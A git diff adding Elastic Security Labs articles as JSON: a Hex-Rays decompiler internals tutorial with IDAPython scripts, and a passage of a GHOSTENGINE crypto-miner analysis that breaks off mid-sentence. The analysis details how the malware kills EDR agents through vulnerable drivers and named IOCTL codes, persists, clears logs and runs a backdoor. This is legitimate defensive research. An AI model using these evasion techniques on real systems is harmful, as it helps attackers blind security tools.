[https://malpedia.caad.fkie.fraunhofer.de/actor/ta428](https://malpedia.caad.fkie.fraunhofer.de/actor/ta428) \n* [https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/](https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/) \n"
+ },
+ "title": "Introducing the REF5961 intrusion set",
+ "slug": "introducing-the-ref5961-intrusion-set",
+ "date": "2023-10-04",
+ "description": "The REF5961 intrusion set discloses three new malware families targeting ASEAN members. The threat actor leveraging this intrusion set continues to develop and mature their capabilities.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "cyril-francois"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "photo-edited-08@2x.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "security-research",
+ "malware-analysis",
+ "ref5961",
+ "ref2924",
+ "eagerbee",
+ "downtown",
+ "rudebird"
+ ]
+ },
+ "id": "security_labs_content-introducing_the_ref5961_intrusion_set-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-introduction_to_hexrays_decompilation_internals-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-introduction_to_hexrays_decompilation_internals-md.json
new file mode 100644
index 00000000000..046c97a5548
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-introduction_to_hexrays_decompilation_internals-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Introduction to Hex-Rays decompilation internals\"\nslug: \"introduction-to-hexrays-decompilation-internals\"\ndate: \"2024-02-14\"\ndescription: \"In this publication, we delve into Hex-Rays microcode and explore techniques for manipulating the generated CTree to deobfuscate and annotate decompiled code.\"\nauthor:\n - slug: salim-bitam\nimage: \"photo-edited-05.png\"\ncategory:\n - slug: malware-analysis\ntags:\n - malware-analysis\n---\n\n## Introduction\n\nIn this publication, we delve into Hex-Rays microcode and explore techniques for manipulating the generated CTree to deobfuscate and annotate decompiled code. The final section includes a practical example demonstrating how to annotate a custom import table for malware analysis.\n\nThis guide is meant to help reverse engineers and malware analysts better understand the internal structures used during IDA's function decompilation. We advise keeping an eye on the [Hex-Rays SDK](https://hex-rays.com/products/decompiler/manual/sdk/index.shtml) that can be found under IDA PRO’s plugins directory, all the structures discussed below are sourced from it.\n\n## Architecture\n\nHex-Rays decompiles a function through a multistage process starting with the disassembled code of a function:\n 1. Assembly code to microcode: \n It does a conversion of the assembly instructions that are stored in an [`insn_t`](https://hex-rays.com/products/ida/support/sdkdoc/classinsn__t.html) structure to microcode instructions represented by a [`minsn_t`](https://hex-rays.com/products/decompiler/manual/sdk/classminsn__t.shtml) structure\n\n 2. 
CTree generation: \n From the optimized microcode, Hex-Rays generates the Abstract Syntax Tree(AST), its nodes are either statements ([`cinsn_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcinsn__t.shtml)) or expressions ([`cexpr_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcexpr__t.shtml)); note that both `cinsn_t` and `cexpr_t` inherit from the [`citem_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcitem__t.shtml) structure\n\n## Microcode\n\nMicrocode is an intermediate language (IL) used by Hex-Rays, generated by lifting the assembly code of a binary. This has multiple advantages, one of which is that it is processor-independent.\n\nThe following screenshot displays the assembly and decompiled code, alongside its microcode extracted using [Lucid](https://github.com/gaasedelen/lucid), a tool that facilitates microcode visualization.\n\n\n\nWe can access the MBA (microcode block array) through the `cfunc_t` structure of a decompiled function with the MBA field.\n\n_Tip:_ we get the `cfunc_t` of a decompiled function with the `ida_hexrays.decompile`.\n\n[`mba_t`](https://hex-rays.com/products/decompiler/manual/sdk/classmba__t.shtml) is an array of micro blocks [`mblock_t`](https://hex-rays.com/products/decompiler/manual/sdk/classmblock__t.shtml), the first block represents the entry point of the function and the last one represents the end. Micro blocks (`mblock_t`) are structured in a double linked list, we can access the next / previous block with `nextb`/`prevb` fields respectively. Each `mblock_t` includes a double linked list of microcode instructions `minsn_t`, accessed by the field `head` for the first instruction of the block and `tail` for the last instruction of the block. 
The `mblock_t` structure is depicted in the following code snippet.\n\n```C\nclass mblock_t\n{\n//...\npublic:\n mblock_t *nextb; ///< next block in the doubly linked list\n mblock_t *prevb; ///< previous block in the doubly linked list\n uint32 flags; ///< combination of \\ref MBL_ bits\n ea_t start; ///< start address\n ea_t end; ///< end address\n minsn_t *head; ///< pointer to the first instruction of the block\n minsn_t *tail; ///< pointer to the last instruction of the block\n mba_t *mba; \n```\n \nA microcode instruction `minsn_t` is a double linked list, each microcode instruction contains 3 operands: left, right, and destination. We can access the next/previous microcode instruction of the same block with `next`/`prev` fields; the opcode field is an enumeration ([`mcode_t`](https://hex-rays.com/products/decompiler/manual/sdk/hexrays_8hpp.shtml#:~:text=enum-,mcode_t,-%7B%0A%C2%A0%C2%A0m_nop)) of all the microinstruction opcodes, for example, the `m_mov` enum represents the `mov` opcode.\n\n```C\nclass minsn_t\n{\n//...\npublic:\n mcode_t opcode; ///< instruction opcode enumeration\n int iprops; ///< combination of \\ref IPROP_ bits\n minsn_t *next; ///< next insn in doubly linked list. check also nexti()\n minsn_t *prev; ///< prev insn in doubly linked list. 
check also previ()\n ea_t ea; ///< instruction address\n mop_t l; ///< left operand\n mop_t r; ///< right operand\n mop_t d; ///< destination operand\n //...\n\nenum mcode_t\n{\n m_nop = 0x00, // nop // no operation\n m_stx = 0x01, // stx l, {r=sel, d=off} // store register to memory \n m_ldx = 0x02, // ldx {l=sel,r=off}, d // load register from memory \n m_ldc = 0x03, // ldc l=const, d // load constant\n m_mov = 0x04, // mov l, d // move \n m_neg = 0x05, // neg l, d // negate\n m_lnot = 0x06, // lnot l, d // logical not\n//...\n};\n```\n\nEach operand is of type [`mop_t`](https://hex-rays.com/products/decompiler/manual/sdk/classmop__t.shtml), depending on the type (accessed with the `t` field) it can hold registers, immediate values, and even nested microcode instructions. As an example, the following is the microcode of a function with multiple nested instructions:\n\n\n\n```C\nclass mop_t\n{\n\tpublic:\n\t /// Operand type.\n\t mopt_t t;\n\tunion\n\t {\n\t mreg_t r; // mop_r register number\n\t mnumber_t *nnn; // mop_n immediate value\n\t minsn_t *d; // mop_d result (destination) of another instruction\n\t stkvar_ref_t *s; // mop_S stack variable\n\t ea_t g; // mop_v global variable (its linear address)\n\t int b; // mop_b block number (used in jmp,call instructions)\n\t mcallinfo_t *f; // mop_f function call information\n\t lvar_ref_t *l; // mop_l local variable\n\t mop_addr_t *a; // mop_a variable whose address is taken\n\t char *helper; // mop_h helper function name\n\t char *cstr; // mop_str utf8 string constant, user representation\n\t mcases_t *c; // mop_c cases\n\t fnumber_t *fpc; // mop_fn floating point constant\n\t mop_pair_t *pair; // mop_p operand pair\n\t scif_t *scif; // mop_sc scattered operand info\n\t };\n\t#...\n}\n\n/// Instruction operand types\ntypedef uint8 mopt_t;\nconst mopt_t\n mop_z = 0, ///< none\n mop_r = 1, ///< register (they exist until MMAT_LVARS)\n mop_n = 2, ///< immediate number constant\n mop_str = 3, ///< immediate string 
constant (user representation)\n #...\n```\n\nThe microcode generation progresses through various maturity levels, also referred to as optimization levels. The initial level, `MMAT_GENERATED`, involves the direct translation of assembly code into microcode. The final optimization level before generating the CTree is `MMAT_LVARS`.\n\n```C\nenum mba_maturity_t\n{\n MMAT_ZERO, ///< microcode does not exist\n MMAT_GENERATED, ///< generated microcode\n MMAT_PREOPTIMIZED, ///< preoptimized pass is complete\n MMAT_LOCOPT, ///< local optimization of each basic block is complete.\n ///< control flow graph is ready too.\n MMAT_CALLS, ///< detected call arguments\n MMAT_GLBOPT1, ///< performed the first pass of global optimization\n MMAT_GLBOPT2, ///< most global optimization passes are done\n MMAT_GLBOPT3, ///< completed all global optimization. microcode is fixed now.\n MMAT_LVARS, ///< allocated local variables\n};\n```\n\n### Microcode traversal example\n\nThe following Python code is used as an example of how to traverse and print the microcode instructions of a function, it traverses the microcode generated at the first maturity level (`MMAT_GENERATED`).\n\n```Python\nimport idaapi\nimport ida_hexrays\nimport ida_lines\n\n\nMCODE = sorted([(getattr(ida_hexrays, x), x) for x in filter(lambda y: y.startswith('m_'), dir(ida_hexrays))])\n\ndef get_mcode_name(mcode):\n \"\"\"\n Return the name of the given mcode_t.\n \"\"\"\n for value, name in MCODE:\n if mcode == value:\n return name\n return None\n\n\ndef parse_mop_t(mop):\n if mop.t != ida_hexrays.mop_z:\n return ida_lines.tag_remove(mop._print())\n return ''\n\n\ndef parse_minsn_t(minsn):\n opcode = get_mcode_name(minsn.opcode)\n ea = minsn.ea\n \n text = hex(ea) + \" \" + opcode\n for mop in [minsn.l, minsn.r, minsn.d]:\n text += ' ' + parse_mop_t(mop)\n print(text)\n \n \ndef parse_mblock_t(mblock):\n minsn = mblock.head\n while minsn and minsn != mblock.tail:\n parse_minsn_t(minsn)\n minsn = minsn.next\n \n\ndef 
parse_mba_t(mba):\n for i in range(0, mba.qty):\n mblock_n = mba.get_mblock(i)\n parse_mblock_t(mblock_n)\n\n\ndef main():\n func = idaapi.get_func(here()) # Gets the function at the current cursor\n maturity = ida_hexrays.MMAT_GENERATED\n mbr = ida_hexrays.mba_ranges_t(func)\n hf = ida_hexrays.hexrays_failure_t()\n ida_hexrays.mark_cfunc_dirty(func.start_ea)\n mba = ida_hexrays.gen_microcode(mbr, hf, None, ida_hexrays.DECOMP_NO_WAIT, maturity)\n parse_mba_t(mba)\n\n\nif __name__ == '__main__':\n main()\n```\n\nThe script's output is presented below: on the left, the printed microcode in the console, and on the right, the assembly code by IDA:\n\n\n\n### CTree\n\nIn this section, we'll dive into the core elements of Hex-Rays CTree structure, then proceed to a practical example demonstrating how to annotate a custom import table of malware that loads APIs dynamically.\n\nFor a better understanding, we will be leveraging the following plugin ([hrdevhelper](https://github.com/patois/HRDevHelper)) that allows us to view the CTree nodes in IDA as a graph.\n\n\n\n[`citem_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcitem__t.shtml) is an abstract class that is the base for both [`cinsn_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcinsn__t.shtml) and [`cexpr_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcexpr__t.shtml), it holds common info like the address, item type and label while also featuring constants like `is_expr`, `contains_expr` that can be used to know the type of the object:\n\n```C\nstruct citem_t\n{\n ea_t ea = BADADDR; ///< address that corresponds to the item. may be BADADDR\n ctype_t op = cot_empty; ///< item type\n int label_num = -1; ///< label number. -1 means no label. items of the expression\n ///< types (cot_...) should not have labels at the final maturity\n ///< level, but at the intermediate levels any ctree item\n ///< may have a label. Labels must be unique. 
Usually\n ///< they correspond to the basic block numbers.\n mutable int index = -1; ///< an index in cfunc_t::treeitems.\n ///< meaningful only after print_func()\n//...\n```\n\nThe item type accessed with the `op` field indicates the type of the node, expression nodes are prefixed with `cot_` and the statements nodes are prefixed with `cit_`, example `cot_asg` indicates that the node is an assignment expression while `cit_if` indicates that the node is a condition (if) statement.\n\nDepending on the type of the statement node, a `cinsn_t` can have a different attribute for example if the item type is `cit_if` we can access the detail of the condition node through the `cif` field, as seen in the below snippet, `cinsn_t` is implemented using a union. Note that a [`cblock_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcblock__t.shtml) is a block statement which is a list of `cinsn_t` statements, we can find this type for example at the beginning of a function or after a conditional statement.\n\n```C\nstruct cinsn_t : public citem_t\n{\n union\n {\n cblock_t *cblock; ///< details of block-statement\n cexpr_t *cexpr; ///< details of expression-statement\n cif_t *cif; ///< details of if-statement\n cfor_t *cfor; ///< details of for-statement\n cwhile_t *cwhile; ///< details of while-statement\n cdo_t *cdo; ///< details of do-statement\n cswitch_t *cswitch; ///< details of switch-statement\n creturn_t *creturn; ///< details of return-statement\n cgoto_t *cgoto; ///< details of goto-statement\n casm_t *casm; ///< details of asm-statement\n };\n//...\n```\n\nIn the example below, the condition node of type `cit_if` has two child nodes: the left one is of type `cit_block` which represents the \"True\" branch and the right is the condition to evaluate, which is a call to a function, a third child is missing as the condition does not have a \"False\" branch.\n\nThe following is a graph showcasing the statement node cit_if\n\n\n\nFind the associated 
decompilation for the above CTree:\n\n\n\nThe same logic applies to expressions nodes `cexpr_t`, depending on the node type, different attributes are available, as an example, a node of type `cot_asg` has children nodes accessible with the fields `x` and `y`.\n\n\n\n```C\nstruct cexpr_t : public citem_t\n{\n union\n {\n cnumber_t *n; ///< used for \\ref cot_num\n fnumber_t *fpc; ///< used for \\ref cot_fnum\n struct\n {\n union\n {\n var_ref_t v; ///< used for \\ref cot_var\n ea_t obj_ea; ///< used for \\ref cot_obj\n };\n int refwidth; ///< how many bytes are accessed? (-1: none)\n };\n struct\n {\n cexpr_t *x; ///< the first operand of the expression\n union\n {\n cexpr_t *y; ///< the second operand of the expression\n carglist_t *a;///< argument list (used for \\ref cot_call)\n uint32 m; ///< member offset (used for \\ref cot_memptr, \\ref cot_memref)\n ///< for unions, the member number\n };\n union\n {\n cexpr_t *z; ///< the third operand of the expression\n int ptrsize; ///< memory access size (used for \\ref cot_ptr, \\ref cot_memptr)\n };\n };\n//...\n```\n\nFinally the [`cfunc_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcfunc__t.shtml) structure holds information related to the decompiled function, the function address, the microcode block array, and the CTree accessed with the `entry_ea`, `mba` and `body` fields respectively.\n\n```C\nstruct cfunc_t\n{\n ea_t entry_ea; ///< function entry address\n mba_t *mba; ///< underlying microcode\n cinsn_t body; ///< function body, must be a block\n//...\n```\n\n### CTree traversal example\n\nThe provided Python code serves as a mini recursive visitor of a CTree, note that it does not handle all node types, the last section will describe how to use the Hex-Rays built-in visitor class [`ctree_visitor_t`](https://hex-rays.com/products/decompiler/manual/sdk/structctree__visitor__t.shtml). 
To begin, we obtain the `cfunc` of the function using `ida_hexrays.decompile` and access its CTree via the `body` field.\n\nNext, we check if the node(item) is an expression or a statement. Finally, we can parse the type through the `op` field and explore its child nodes.\n\n```Python\nimport idaapi\nimport ida_hexrays\n\nOP_TYPE = sorted([(getattr(ida_hexrays, x), x) for x in filter(lambda y: y.startswith('cit_') or y.startswith('cot_'), dir(ida_hexrays))])\n\n\ndef get_op_name(op):\n \"\"\"\n Return the name of the given mcode_t.\n \"\"\"\n for value, name in OP_TYPE:\n if op == value:\n return name\n return None\n\n\ndef explore_ctree(item):\n print(f\"item address: {hex(item.ea)}, item opname: {item.opname}, item op: {get_op_name(item.op)}\")\n if item.is_expr():\n if item.op == ida_hexrays.cot_asg:\n explore_ctree(item.x) # left side\n explore_ctree(item.y) # right side\n\n elif item.op == ida_hexrays.cot_call:\n explore_ctree(item.x)\n for a_item in item.a: # call parameters\n explore_ctree(a_item)\n\n elif item.op == ida_hexrays.cot_memptr:\n explore_ctree(item.x)\n else:\n if item.op == ida_hexrays.cit_block:\n for i_item in item.cblock: # list of statement nodes\n explore_ctree(i_item)\n\n elif item.op == ida_hexrays.cit_expr:\n explore_ctree(item.cexpr)\n \n elif item.op == ida_hexrays.cit_return:\n explore_ctree(item.creturn.expr)\n \n\ndef main():\n cfunc = ida_hexrays.decompile(here())\n ctree = cfunc.body\n explore_ctree(ctree)\n\n\nif __name__ == '__main__':\n main()\n```\n\nDisplayed below is the output of the traversal script executed on the `start` function of a [BLISTER](https://www.elastic.co/security-labs/revisiting-blister-new-developments-of-the-blister-loader) [sample](https://www.virustotal.com/gui/file/c98137e064bc0cd32ed0415e19daf16ed451fe1289bc41e7251dd79326206d53):\n\n\n\n### Practical example: annotating the custom import table of a malware sample\n\nNow that we've gained insights into the architecture and structures of the generated 
CTree, let's delve into a practical application and explore how to automate the annotation of a custom import table of malware.\n\n\n\nHex-Rays provides a utility class [`ctree_visitor_t`](https://hex-rays.com/products/decompiler/manual/sdk/structctree__visitor__t.shtml) that can be used to traverse and modify the CTree, two important virtual methods to know are:\n - `visit_insn`: to visit a statement\n - `visit_expr`: to visit an expression\n\nFor this example, the same BLISTER sample is used; after locating the function that gets Windows APIs addresses by hash at address 0x7FF8CC3B0926(in the .rsrc section), adding the enumeration to the IDB and applying the enum type to its parameter, we create a class that inherits from `ctree_visitor_t`, as we are interested in expressions, we will be overriding `visit_expr` only.\n\n\n\nThe idea is to locate a `cot_call` node(1) of the function that resolves APIs by passing the `obj_ea` address of node’s first child to the function `idc.get_name` which will return the function name.\n\n```Python\n if expr.op == idaapi.cot_call:\n if idc.get_name(expr.x.obj_ea) == self.func_name:\n\t\t#...\n```\n\nNext retrieve the enum of the hash by accessing the right parameter of the call node(2), in our case parameter 3.\n\n```Python\n carg_1 = expr.a[HASH_ENUM_INDEX]\n api_name = ida_lines.tag_remove(carg_1.cexpr.print1(None)) # Get API name\n```\n\nThe next step is to locate the variable that has been assigned the address value of the WinAPI function. 
To do that we first need to locate the `cot_asg` node(3), parent of the call node by using the `find_parent_of` method under `cfunc.body` of the decompiled function.\n\n```Python\n asg_expr = self.cfunc.body.find_parent_of(expr) # Get node parent\n```\n\nFinally, we can access the first child node(4) under the `cot_asg` node, which is of type `cot_var` and get the current variable name, the Hex-Rays API [`ida_hexrays.rename_lvar`](https://hex-rays.com/products/decompiler/manual/sdk/hexrays_8hpp.shtml#ab719cfcfa884c57284cd946ac90b3c17) is used to rename the new variable with the Windows API name taken from the enum parameter.\n\nThis process can ultimately save a significant amount of time for an analyst. Instead of spending time on relabeling variables, they can direct their attention to the core functionality. An understanding of how CTrees work can contribute to the development of more effective plugins, enabling the handling of more complex obfuscations.\n\nFor a complete understanding and context of the example, please find the entire code below:\n\n```Python\nimport idaapi\nimport ida_hexrays\nimport idc\nimport ida_lines\nimport random\nimport string\n\nHASH_ENUM_INDEX = 2\n\n\ndef generate_random_string(length):\n letters = string.ascii_letters\n return \"\".join(random.choice(letters) for _ in range(length))\n\n\nclass ctree_visitor(ida_hexrays.ctree_visitor_t):\n def __init__(self, cfunc):\n ida_hexrays.ctree_visitor_t.__init__(self, ida_hexrays.CV_FAST)\n self.cfunc = cfunc\n self.func_name = \"sub_7FF8CC3B0926\"# API resolution function name\n\n def visit_expr(self, expr):\n if expr.op == idaapi.cot_call:\n if idc.get_name(expr.x.obj_ea) == self.func_name:\n carg_1 = expr.a[HASH_ENUM_INDEX]\n api_name = ida_lines.tag_remove(\n carg_1.cexpr.print1(None)\n ) # Get API name\n expr_parent = self.cfunc.body.find_parent_of(expr) # Get node parent\n\n # find asg node\n while expr_parent.op != idaapi.cot_asg:\n expr_parent = 
self.cfunc.body.find_parent_of(expr_parent)\n\n if expr_parent.cexpr.x.op == idaapi.cot_var:\n lvariable_old_name = (\n expr_parent.cexpr.x.v.getv().name\n ) # get name of variable\n ida_hexrays.rename_lvar(\n self.cfunc.entry_ea, lvariable_old_name, api_name\n ) # rename variable\n return 0\n\n\ndef main():\n cfunc = idaapi.decompile(idc.here())\n v = ctree_visitor(cfunc)\n v.apply_to(cfunc.body, None)\n\n\nif __name__ == \"__main__\":\n main()\n```\n\n## Conclusion\n\nConcluding our exploration into Hex-Rays microcode and CTree generation, we've gained practical techniques for navigating the complexities of malware obfuscation. The ability to modify Hex-Rays pseudo code allows us to cut through obfuscation like Control Flow Obfuscation, remove dead code, and many more. The Hex-Rays C++ SDK emerges as a valuable resource, offering well-documented guidance for future reference. \n\nWe hope that this guide will be helpful to fellow researchers and any avid learner, please find all the scripts in our [research repository](https://github.com/elastic/labs-releases/tree/main/tools/ida_scripts).\n\n## Resources\n\n - [Ilfak Guilfanov's Decompiler Internals: Microcode presentation](https://i.blackhat.com/us-18/Thu-August-9/us-18-Guilfanov-Decompiler-Internals-Microcode-wp.pdf)\n - [Hex-Rays decompiler primer](https://hex-rays.com/blog/hex-rays-decompiler-primer)\n - [HRDevHelper](https://github.com/patois/HRDevHelper/)\n - [lucid utility](https://github.com/gaasedelen/lucid)\n - [Hex-Rays SDK](https://hex-rays.com/products/decompiler/manual/sdk/)\n - [Elastic Security Labs enablement tools](https://github.com/elastic/labs-releases)\n"
+ },
+ "title": "Introduction to Hex-Rays decompilation internals",
+ "slug": "introduction-to-hexrays-decompilation-internals",
+ "date": "2024-02-14",
+ "description": "In this publication, we delve into Hex-Rays microcode and explore techniques for manipulating the generated CTree to deobfuscate and annotate decompiled code.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ }
+ ],
+ "image": "photo-edited-05.png",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "malware-analysis"
+ ]
+ },
+ "id": "security_labs_content-introduction_to_hexrays_decompilation_internals-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-invisible_miners_unveiling_ghostengine-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-invisible_miners_unveiling_ghostengine-md.json
new file mode 100644
index 00000000000..4c7730da1e3
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-invisible_miners_unveiling_ghostengine-md.json
@@ -0,0 +1,40 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Invisible miners: unveiling GHOSTENGINE’s crypto mining operations\"\nslug: \"invisible-miners-unveiling-ghostengine\"\ndate: \"2024-05-22\"\ndescription: \"Elastic Security Labs has identified REF4578, an intrusion set incorporating several malicious modules and leveraging vulnerable drivers to disable known security solutions (EDRs) for crypto mining.\"\nauthor:\n - slug: salim-bitam\n - slug: samir-bousseaden\n - slug: terrance-dejesus\n - slug: andrew-pease\nimage: \"ghostengine.jpg\"\ncategory:\n - slug: attack-pattern\ntags:\n - ref4578\n - ghostengine\n - xmrig\n - crypto\n - hiddenshovel\n---\n\n## Preamble\n\nElastic Security Labs has identified an intrusion set incorporating several malicious modules and leveraging vulnerable drivers to disable known security solutions (EDRs) for crypto mining. Additionally, the team discovered capabilities to establish persistence, install a previously undocumented backdoor, and execute a crypto-miner. We refer to this intrusion set as REF4578 and the primary payload as GHOSTENGINE (tangential research by the team at Antiy has named parts of this intrusion set [HIDDENSHOVEL](https://www.antiy.com/response/HideShoveling.html)).\n\n## Key takeaways\n\n* Malware authors incorporated many contingency and duplication mechanisms\n* GHOSTENGINE leverages vulnerable drivers to terminate and delete known EDR agents that would likely interfere with the deployed and well-known coin miner\n* This campaign involved an uncommon amount of complexity to ensure both the installation and persistence of the XMRIG miner\n\n## Code analysis \n\n\n\nOn May 6, 2024, at 14:08:33 UTC, the execution of a PE file named `Tiworker.exe` (masquerading as the legitimate Windows `TiWorker.exe` file) signified the beginning of the REF4578 intrusion. 
The following alerts were captured in telemetry, indicating a known vulnerable driver was deployed.\n\n\n\nUpon execution, this file downloads and executes a PowerShell script that orchestrates the entire execution flow of the intrusion. Analysis revealed that this binary executes a hardcoded PowerShell command line to retrieve an obfuscated script, `get.png,` which is used to download further tools, modules, and configurations from the attacker C2– as depicted in the screenshot below.\n\n\n\n### GHOSTENGINE\n\nGHOSTENGINE is responsible for retrieving and executing modules on the machine. It primarily uses HTTP to download files from a configured domain, with a backup IP in case domains are unavailable. Additionally, it employs FTP as a secondary protocol with embedded credentials. The following is a summary of the execution flow:\n\n\n\nThis script downloads and executes `clearn.png`, a component designed to purge the system of remnants from prior infections belonging to the same family but different campaign; it removes malicious files under `C:\\Program Files\\Common Files\\System\\ado` and `C:\\PROGRA~1\\COMMON~1\\System\\ado\\` and removes the following scheduled tasks by name:\n\n* `Microsoft Assist Job`\n* `System Help Center Job`\n* `SystemFlushDns`\n* `SystemFlashDnsSrv`\n\nEvidence of those scheduled task artifacts may be indicators of a prior infection.\n\n\n\nDuring execution, it attempts to disable Windows Defender and clean the following Windows event log channels: \n\n* `Application`\n* `Security`\n* `Setup`\n* `System`\n* `Forwarded Events`\n* `Microsoft-Windows-Diagnostics-Performance`\n* `Microsoft-Windows-AppModel-Runtime/Operational`\n* `Microsoft-Windows-Winlogon/Operational`\n\n\n\n`get.png` disables Windows Defender, enables remote services, and clears the contents of:\n\n* `C:\\Windows\\Temp\\`\n* `C:\\Windows\\Logs\\`\n* `C:\\$Recycle.Bin\\`\n* `C:\\windows\\ZAM.krnl.trace`\n\n\n\n`get.png` also verifies that the `C:\\` volume has at least 
10 MB of free space to download files, storing them in `C:\\Windows\\Fonts`. If not, it will try to delete large files from the system before looking for another suitable volume with sufficient space and creating a folder under `$RECYCLE.BIN\\Fonts`.\n\nTo get the current DNS resolution for the C2 domain names, GHOSTENGINE uses a hardcoded list of DNS servers, `1.1.1.1` and `8.8.8.8`.\n\nNext, to establish persistence, `get.png` creates the following scheduled tasks as `SYSTEM`:\n\n* **OneDriveCloudSync** using `msdtc `to run the malicious service DLL `C:\\Windows\\System32\\oci.dll` every 20 minutes (described later)\n* **DefaultBrowserUpdate** to run `C:\\Users\\Public\\run.bat,` which downloads the `get.png` script and executes it every 60 minutes\n* **OneDriveCloudBackup** to execute `C:\\Windows\\Fonts\\smartsscreen.exe` every 40 minutes\n \n\n\n`get.png` terminates all `curl.exe` processes and any PowerShell process with `*get.png*` in its command line, excluding the current process. This is a way to terminate any concurrently running instance of the malware.\n\nThis script then downloads `config.txt`, a JSON file containing the hashes of the PE files it retrieved. This file verifies whether any updated binaries are to be downloaded by checking the hashes of the previously downloaded files from any past infections.\n\n\n\nFinally,` get.png` downloads all of its modules and various PE files. 
Below is a table containing a description of each downloaded file:\n\n| path | Type | Description |\n|------------------------------------------------|-------------------|--------------------------------------------------------------------------------------------------------------------------------------------|\n| `C:\\Windows\\System32\\drivers\\aswArPots.sys` | Kernel driver | Vulnerable driver from Avast |\n| `C:\\Windows\\System32\\drivers\\IObitUnlockers.sys` | Kernel driver | Vulnerable driver from IObit |\n| `C:\\Windows\\Fonts\\curl.exe` | PE executable | Used to download files via cURL |\n| `C:\\Windows\\Fonts\\smartsscreen.exe` | PE executable | Core payload (GHOSTENGINE), its main purpose is to deactivate security instrumentation, complete initial infection, and execute the miner. |\n| `C:\\Windows\\System32\\oci.dll` | Service DLL | Persistence/updates module |\n| `backup.png` | Powershell script | Backdoor module |\n| `kill.png` | Powershell script | A PowerShell script that injects and executes a PE file responsible for killing security sensors |\n\n### GHOSTENGINE modules\n\nGHOSTENGINE deploys several modules that can tamper with security tools, create a backdoor, and check for software updates.\n\n#### EDR agent controller and miner module: smartsscreen.exe\n\nThis module primarily terminates any active EDR agent processes before downloading and installing a crypto-miner.\n\n\n\nThe malware scans and compares all the running processes with a hardcoded list of known EDR agents. If there are any matches, it first terminates the security agent by leveraging the Avast Anti-Rootkit Driver file `aswArPots.sys` with the IOCTL `0x7299C004` to terminate the process by PID.\n\n`smartscreen.exe` is then used to delete the security agent binary with another vulnerable driver, `iobitunlockers.sys` from IObit, with the IOCTL `0x222124`.\n\n`smartscreen.exe` then downloads the XMRig client mining program (`WinRing0x64.png`) from the C2 server as `taskhostw.png`. 
Finally, it executes XMRig, its drivers, and the configuration file `config.json`, starting the mining process.\n\n\n\n#### Update/Persistence module: oci.dll\n\nThe PowerShell script creates a service DLL (`oci.dll`), a phantom DLL loaded by `msdtc`. The DLL's architecture varies depending on the machine; it can be 32-bit or 64-bit. Its primary function is to create system persistence and download any updates from the C2 servers by downloading the `get.png` script from the C2 and executing it.\n\n\n\nEvery time the `msdtc` service starts, it will load `oci.dll` to spawn the PowerShell one-liner that executes `get.png`:\n\n\n\n#### EDR agent termination module: `kill.png`\n\n`kill.png` is a PowerShell script that injects shellcode into the current process, decrypting and loading a PE file into memory.\n\n\n\nThis module is written in C++, and the authors have integrated redundancy into its operation. This redundancy is evident in the replication of the technique used in `smartsscreen.exe` to terminate and delete EDR agent binaries; it continuously scans for any new processes.\n\n\n\n#### Powershell backdoor module: `backup.png`\n\nThe PowerShell script functions like a backdoor, enabling remote command execution on the system. It continually sends a Base64-encoded JSON object containing a unique ID, derived from the current time and the computer name while awaiting base64-encoded commands. The results of those commands are then sent back.\n\n\n\nIn this example `eyJpZCI6IjE3MTU2ODYyNDA3MjYyNiIsImhvc3QiOiJhbmFseXNpcyJ9` is the Base64-encoded JSON object:\n\n\n\n```\n$ echo \"eyJpZCI6IjE3MTU2ODYyNDA3MjYyNiIsImhvc3QiOiJhbmFseXNpcyJ9\" | base64 -D\n{\"id\":\"171568624072626\",\"host\":\"analysis\"}\n```\n\n## Miner configuration\n\nXMRig is a legitimate crypto miner, and they have documented the configuration file usage and elements [here](https://xmrig.com/docs/miner/config). 
As noted at the beginning of this publication, the ultimate goal of the REF4578 intrusion set was to gain access to an environment and deploy a persistent Monero crypto miner, XMRig.\n\nWe extracted the configuration file from the miner, which was tremendously valuable as it allowed us to report on the Monero Payment ID and track the worker and pool statistics, mined cryptocurrency, transaction IDs, and withdrawals.\n\nBelow is an excerpt from the REF4578 XMRig configuration file:\n\n```\n{\n \"autosave\": false,\n \"background\": true,\n \"colors\": true,\n\n...truncated...\n\n \"donate-level\": 0,\n \"donate-over-proxy\": 0,\n \"pools\": [\n {\n \"algo\": \"rx/0\",\n \"coin\": \"monero\",\n \"url\": \"pool.supportxmr[.]com:443\",\n \"user\": \"468ED2Qcchk4shLbD8bhbC3qz2GFXqjAUWPY3VGbmSM2jfJw8JpSDDXP5xpkMAHG98FHLmgvSM6ZfUqa9gvArUWP59tEd3f\",\n \"keepalive\": true,\n \"tls\": true\n\n...truncated...\n\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\",\n \"verbose\": 0,\n \"watch\": true,\n \"pause-on-battery\": false,\n \"pause-on-active\": false\n}\n```\n\n### Monero Payment ID\n\nMonero 